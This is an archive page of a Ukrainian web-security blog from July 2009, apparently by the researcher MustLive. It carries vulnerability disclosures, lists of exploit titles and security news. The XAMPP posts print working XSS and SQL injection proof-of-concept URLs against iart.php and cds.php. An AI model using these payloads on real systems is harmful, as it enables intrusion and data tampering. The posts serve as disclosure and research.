Архів за Липень, 2009

MustLive Perl Pascal Programs Interpreter

22:43 28.07.2009

Сьогодні вийшла нова версія програми Perl Pas Interpreter v.1.4.10. В новій версії:

  • Додана можливість в операторі insert додавати рядок в пустий рядок.
  • Додане повідомлення в дебаг-режимі при обмеженні розміру строкових даних.
  • Додане обмеження розміру строкових даних в функції pos, delete та copy.
  • Покращена робота з функціями в операторі if та циклах.

Деталі на сайті інтерпретатора. Тема для обговорення програми на форумі.

Додаткова інформація про Perl Pas Interpreter в розділі Онлайн інструменти.

Уразливості в XAMPP

20:23 28.07.2009

23.06.2009

Сьогодні я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

28.07.2009

XSS:

http://site/xampp/iart.php?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Insufficient Anti-automation:

http://site/xampp/mailform.php

При доступі в адмінку та якщо включений SMTP Service (Mercury Mail) можна відправляти спам в зв’язку з відсутністю захисту від автоматизованих запитів.

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

Добірка експлоітів

16:10 28.07.2009

В даній добірці експлоіти в веб додатках:

  • Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit (деталі)
  • FubarForum 1.6 Admin Bypass Change User Password Vulnerability (деталі)
  • TaskDriver <= 1.3 Remote Change Admin Password Exploit (деталі)
  • eDContainer v2.22 (lg) Local File Inclusion Vulnerability (деталі)
  • eDNews v2 (lg) Local File Inclusion Vulnerability (деталі)
  • webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Silentum LoginSys 1.0.0 Insecure Cookie Handling vulnerability (деталі)
  • Flexphplink Pro Arbitrary File Upload Exploit (деталі)
  • ForumApp 3.3 Remote Database Disclosure Vulnerability (деталі)
  • PHP-Fusion Mod TI (id) Remote SQL Injection Vulnerability (деталі)
  • Sepcity Lawyer Portal (deptdisplay.asp ID) SQL Injection Vulnerability (деталі)
  • Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability (деталі)
  • Joomla Component com_na_content 1.0 Blind SQL Injection Vulnerability (деталі)
  • CMS NetCat 3.0/3.12 Blind SQL Injection Exploit (деталі)
  • Exploits MySQL <= 5.0.45 post auth format string vulnerability (деталі)

Спамери укорочують лінки

22:46 27.07.2009

Укорочені URL, що використовуються на деяких сайтах для стиснення довгих веб-адрес у короткі лінки, швидко перетворюються в популярне знаряддя спамерів, що намагаються в такий спосіб добратися до нічого не підозрюючих користувачів. За даними нового звіту MessageLabs, укорочені URL тепер зустрічаються в 2% усіх листів зі спамом.

Як повідомляють фахівці компанії, присутність укорочених URL у спамі різко збільшилася в останні кілька тижнів. Відбулося це через те, що такі лінки стали використовуватися в електронних листах, що розсилаються ботнетом Donbot. Як видно, власникам ботнета вдалося автоматизувати процес створення укорочених лінок, і впровадити відповідний код у код ботнета чи шаблони листів.

Створити укорочені посилання пропонують десятки сайтів, і хакери схоже зрозуміли, що використання цих сервісів рятує їх від необхідності переборювати CAPTCHA чи реєструвати аккаунт. Щоб сховати походження лінки чи використовувати інші сервисі для перенапрямку своїх жертв, хакерам раніше приходилося реєструвати там аккаунти, а для цього їм потрібно було переборювати систему захисту від автоматизованих реєстрацій, засновану на CAPTCHA. Однак сайти, що пропонують покоротшати інтернет-лінки, не вимагають реєстрації, тому автоматизувати процес їхнього створення для спамерів не складно.

Небезпека укорочених лінок полягає в тому, що ти ніколи не знаєш, куди вони тебе приведуть. Крім того, такий спам не можна зупинити, ґрунтуючись на фільтрації за принципом чорних списків, тому що реальне доменне ім’я в укороченому варіанті адреси сховано. Незважаючи на те, що техніка поширення цього спама нова, його зміст, по відомостям MessageLabs, нічим не відрізняється від попередніх зразків.

Експерти попереджають, що ця ж сама методика може бути використана і для перенапрямку жертв на сайти, що здійснюють атаки при завантаженні, хоча подібні випадки поки і не були зафіксовані.

По матеріалам http://www.xakep.ru.

P.S.

Про використання коротких URL я вже писав в своїй статті Використання сервісів редирекції для обходу фільтрів. Так само як і при атаках на веб сайти, сервіси укорочення URL можуть використовуватися в електронних листах.

Підміна URL в Mozilla Firefox

20:18 27.07.2009

Виявлена можливість підміни URL в Mozilla Firefox.

Уразливі версії: Mozilla Firefox 3.0.

Можна підмінити повідомлення про помилку при неправильному URL.

  • URL spoofing bug involving Firefox’s error pages and document.write (деталі)

Добірка уразливостей

17:31 27.07.2009

В даній добірці уразливості в веб додатках:

Численні уразливості в WordPress 2.8 та MU 2.7.1

23:57 25.07.2009

В цьому місяці були оприлюднені численні уразливості в WordPress. Уразливі WordPress 2.8 та попередні версії, WordPress MU 2.7.1 та попередні версії, а також версія, що використовується на wordpress.com.

Були виявлені Local file include, Privileges unchecked, Cross-Site Scripting та Information disclosure уразливості.

Зокрема Local file include атака можлива через вектор, про який я писав ще в 2007 році в проекті День багів в WordPress (і який був неякісно виправлений розробниками WP). А також автори даного advisory згадали про Abuse of Functionality уразливість в WordPress, про яку я писав ще в квітні 2008 року.

  • WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures (деталі)

Липневий вівторок патчів від Microsoft

21:24 25.07.2009

В липні місяці Microsoft випустила шість патчів. Що менше ніж у червні.

У липневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло шість оновлень безпеки.

Серед них три мають критичний статус, інші - важливий. Усі критичні уразливості містяться в Windows, по одній важливій приходиться на Publisher, Internet Security and Acceleration (ISA) Server і Virtual PC на пару з Virtual Server. Серед усунутих уразливостей знаходяться виявлені в травні діри в DirectX, уже замічені в обмеженій експлуатації за допомогою шкідливих файлів QuickTime.

По матеріалам http://news.techlabs.by.

Нові уразливості в XAMPP

19:32 25.07.2009

20.06.2009

У червні, 11.06.2009, а також додатково сьогодні, я знайшов Information Leakage, Cross-Site Request Forgery та SQL Injection уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.07.2009

Information Leakage:

http://site/xampp/phpinfo.php

При доступі в адмінку (через Insufficient Authorization уразливості) можна отримати багато інформації про систему.

CSRF:

http://site/xampp/cds.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

SQL Injection:

http://site/xampp/cds.php?action=del&id=-1%20or%201=1

http://site/xampp/cds.php?interpret=1&titel=1&jahr=1),(version(),1,1

http://site/xampp/cds.php?interpret=1&titel=’,1,1),(version(),1,1)/* (mq off)

http://site/xampp/cds.php?titel=1&interpret=’,1),(version(),1,1)/* (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

Добірка експлоітів

16:15 25.07.2009

В даній добірці експлоіти в веб додатках:

  • Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln (деталі)
  • Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln (деталі)
  • ILIAS <= 3.7.4 (ref_id) Blind SQL Injection Vulnerability (деталі)
  • doop CMS <= 1.4.0b (CSRF/Upload Shell) Multiple Remote Vulnerabilities (деталі)
  • BloofoxCMS 0.3.4 (lang) Local File Inclusion Vulnerability (деталі)
  • ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability (деталі)
  • Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit (vista) (деталі)
  • OwenPoll 1.0 Insecure Cookie Handling Vulnerability (деталі)
  • AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln (деталі)
  • FubarForum 1.6 Arbitrary Admin Bypass Vulnerability (деталі)
  • DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit (деталі)
  • Joomla Component mdigg 2.2.8 Blind SQL Injection Exploit (деталі)
  • Joomla Component com_ice 0.5b2 Blind SQL Injection Exploit (деталі)
  • Joomla Component com_liveticker 1.0 Blind SQL Injection Exploit (деталі)
  • Easydynamicpages 30tr Exploit (деталі)